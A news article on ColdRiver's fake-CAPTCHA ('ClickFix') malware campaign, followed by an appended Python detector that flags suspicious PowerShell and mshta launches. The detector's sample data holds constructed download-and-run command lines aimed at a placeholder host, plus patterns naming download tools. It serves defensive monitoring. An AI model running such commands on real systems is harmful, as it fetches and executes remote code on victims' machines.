Russian state-backed hackers are using fake “I am not a robot” CAPTCHA pages to deliver new strains of espionage malware, according to Google Cloud’s Threat Intelligence Group (GTIG), marking a fresh evolution in tactics by the ColdRiver group that has long targeted Western governments, think tanks, and media organizations.
The group, also known as Star Blizzard, UNC4057, or Callisto, has replaced its previously exposed LostKeys malware with a new suite of tools, including NOROBOT, YESROBOT, and MAYBEROBOT.
These programs can evade detection through multi-stage delivery chains and encrypted payloads. Google said the shift came just days after the company published technical details on LostKeys earlier this year.
ColdRiver’s latest campaign uses social engineering tactics known as “ClickFix,” tricking victims into running malicious code disguised as CAPTCHA verification steps.
“NOROBOT and its preceding infection chain have been subject to constant evolution — initially simplified to increase chances of successful deployment, before re-introducing complexity by splitting cryptography keys,” GTIG said. “The shift back to more complex delivery chains increases the difficulty of tracking their campaigns. This constant development highlights the group’s efforts to evade detection systems for their delivery mechanism for continued intelligence collection against high-value targets.”
The technique shows a growing trend in state-sponsored operations that combine psychological manipulation with stealthy modular malware to bypass enterprise defenses.
“ColdRiver’s quick pivot from exposed infrastructure to new delivery methods like fake CAPTCHAs reveals a lot about their capabilities,” said Akshat Tyagi, associate practice leader at HFS Research. “They are operationally very agile because, practically within weeks, they shifted infrastructure, rewrote delivery mechanisms, and deployed new payloads. It seems they are a well-funded and well-resourced team. They likely have a modular architecture allowing them to replace components, and they also have access to global engineering talent.”
Inside the findings
Google said the new malware families have been in active development from May through September 2025, with the attackers repeatedly refining their tools to evade detection. The pace of updates shows ColdRiver’s ability to rebuild its toolset almost immediately after public exposure.
The earliest NOROBOT sample used a cryptographic scheme that split the decryption key across multiple components that had to be recombined in a specific order to decrypt the final payload.
YESROBOT is described in Google’s report as a minimal Python backdoor that requires every command to be valid Python, making basic functions such as downloading files or retrieving documents more cumbersome to implement. A later NOROBOT build was drastically simplified, fetching a single file that, in observed cases, installed a logon script to establish persistence.
“The specific changes made between NOROBOT variants highlight the group’s persistent effort to evade detection systems while ensuring continued intelligence collection against high-value targets,” the report said.
Evolving tactics and strategies
Analysts said ColdRiver, which for years focused on credential theft and email account compromise, is shifting toward multi-stage intrusions that rely on users to execute malicious code.
By using ClickFix pages that mimic CAPTCHA verification screens, the group can bypass email security filters and deliver malware directly to victims’ devices, increasing the likelihood of infection.
“At this stage, it is difficult to expect end users to identify and discard fraudulent CAPTCHA, since CAPTCHA is part of the standard access process,” said cybersecurity analyst Sunil Varkey. “The only option is to monitor behavioral changes, living-off-the-land telemetry, and abnormal activity through tools such as EDR and NDR. Organizations need to understand how users and hosts behave in specific scenarios and monitor deviations, which requires having a strong baseline and enforcing it.”
This shift from simple phishing to multi-stage, interactive attacks shows ColdRiver’s ability to adapt to improved cyber awareness among users. Traditional lures are less effective as people become cautious about clicking suspicious links, but CAPTCHA pages still feel familiar and safe, a trust ColdRiver has learned to exploit.
“Tactically, it indicates ColdRiver’s focus on operational security (OPSEC) and stealth,” said Sanjaya Kumar, CEO of SureShield. “The malware uses encrypted communications and anti-analysis techniques, allowing prolonged access for months without detection. Target selection remains high value, including NGOs, dissidents, policy advisors, and Western officials, but the CAPTCHA method also extends to softer targets in think tanks and academia, where quick credential theft can lead to espionage chains.”
For defenders, this underscores the need to move beyond traditional two-factor authentication and adopt behavioral and context-aware monitoring to identify stealthy, user-assisted intrusions.
Defense options for enterprises
Because the attackers target specific organizations and individuals, they can use server-side filtering to deliver malware only to selected victims, making large-scale detection difficult, analysts said. Detection is further complicated when global security vendors have not yet developed or prioritized signatures for the new attacks.
“Defenders need to be fully aware that this isn’t a basic phishing gang using off-the-shelf malware,” Varkey said. “It appears to be state-linked or state-sponsored, with significant resources and the ability to pivot to new tools and delivery methods rapidly. Defenders cannot depend solely on IOCs, and organizations may need to strengthen their security posture to protect high-value assets significantly.”
Kumar added that effective defense requires a layered and behavior-focused approach that uses tools to monitor anomalous PowerShell execution, unusual network calls to command-and-control servers, or fileless malware patterns.
Security teams should establish baselines for normal activity and generate alerts when deviations occur, such as unexpected login attempts from foreign IP addresses or rapid data exfiltration. “Focus on building a zero-trust architecture and enforce least-privilege access and micro-segmentation to limit lateral movement,” Kumar said. “Continuous vulnerability management scans to patch endpoints before exploitation, combined with security awareness training on interactive phishing (e.g., simulated CAPTCHA attacks), to cut success rates. Incident response needs to be solidified, so simulate multi-stage attacks to test containment. Proactive cyber hygiene – regular patching, endpoint hardening, and threat hunting – is essential.”
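To make the behavior-focused monitoring Kumar describes concrete, here is an added example in Python (not from the article, GTIG, or any vendor): a small scorer over constructed process-creation events that flags a script interpreter launched from the user's shell with traits typical of a pasted "verification" command, while a baseline of known parent/image pairs suppresses routine automation. The event field layout, the baseline, the trait patterns and the threshold are all assumptions for illustration.

```python
import re

# Constructed process-creation events (hypothetical layout: parent|image|command line).
# The base64 body in the first line is a placeholder, not a real payload.
EVENTS = [
    "explorer.exe|powershell.exe|powershell -w hidden -ep bypass -enc <constructed-base64-placeholder>",
    "explorer.exe|mshta.exe|mshta https://example.invalid/verify/captcha.hta",
    "explorer.exe|powershell.exe|powershell -c \"iwr https://example.invalid/v -OutFile u.vbs; wscript u.vbs\"",
    "services.exe|powershell.exe|powershell -File C:/ProgramData/Backup/nightly.ps1",
    "explorer.exe|powershell.exe|powershell",
    "devenv.exe|powershell.exe|powershell -NoProfile -Command Get-ChildItem",
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Parent/image pairs observed as normal during a (constructed) baselining period.
BASELINE = {("services.exe", "powershell.exe"), ("devenv.exe", "powershell.exe")}
# Command-line traits a user-pasted "verification" snippet tends to carry:
# hidden window, bypassed execution policy, encoded command, download-and-run.
TRAITS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded_cmd": re.compile(r"-e(nc|ncodedcommand)\b", re.I),
    "download": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b|https?://", re.I),
}

def analyze(event):
    """Score one event; None when the image is not an interpreter we care about."""
    parent, image, cmdline = event.split("|", 2)
    parent, image = parent.lower(), image.lower()
    if image not in INTERPRETERS:
        return None
    traits = [name for name, rx in TRAITS.items() if rx.search(cmdline)]
    # An interpreter spawned by the user's shell is the entry point of a ClickFix-style
    # lure; each suspicious trait raises the score, a baseline match lowers it.
    score = len(traits) + (1 if parent == "explorer.exe" else 0) - (1 if (parent, image) in BASELINE else 0)
    return {"parent": parent, "image": image, "traits": traits, "score": score}

def alerts(events, threshold=2):
    """Return the analyzed events whose score reaches the alert threshold."""
    out = []
    for ev in events:
        r = analyze(ev)
        if r is not None and r["score"] >= threshold:
            out.append(r)
    return out

if __name__ == "__main__":
    for a in alerts(EVENTS):
        print(a)
```

A bare interactive PowerShell from explorer.exe scores 1 and stays below the threshold, which is the point of combining traits with a baseline rather than alerting on the interpreter alone.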